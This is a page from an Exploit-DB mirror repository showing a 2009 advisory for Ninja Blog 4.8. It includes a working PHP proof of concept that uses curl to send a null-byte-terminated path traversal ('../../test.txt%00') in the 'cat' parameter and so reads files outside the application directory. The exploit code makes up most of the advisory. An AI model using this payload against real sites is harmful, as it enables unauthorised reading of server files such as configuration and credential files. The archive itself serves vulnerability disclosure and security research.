bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7831.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
1,018 B
Text
Raw Blame History

Vendor: http://ninjadesigns.co.uk
Version(s): Ninja Blog 4.8 (May also affect earlier versions)
Credit: Danny Moules
Critical: Yes
See PUSH 55 Advisory at http://www.push55.co.uk/index.php?s=ad&id=6
----
Due to insufficient validation of client-side data, we can alter the path of files to be read to a file outside the intended directory.
The following PoC will read a file named 'test.txt' one level above the application folder.
---
<?php
$strToRead = "../../test.txt%00"; //Designates 'test.txt', sat one level above the application folder, to be read
$strSite = "http://www.example.com/ninjablog4.8/"; //Don't forget the trailing slash
$objCurl = curl_init();
curl_setopt($objCurl, CURLOPT_URL, $strSite."entries/index.php?cat=".$strToRead);
curl_setopt($objCurl, CURLOPT_RETURNTRANSFER, true);
echo("Getting data...\n");
$strDump = curl_exec($objCurl);
curl_close($objCurl);
echo("<div style=\"border: solid 2px black; padding: 10px; margin: 10px;\">$strDump</div>\n");
?>
# milw0rm.com [2009-01-19]
Reference in a new issue View git blame Copy permalink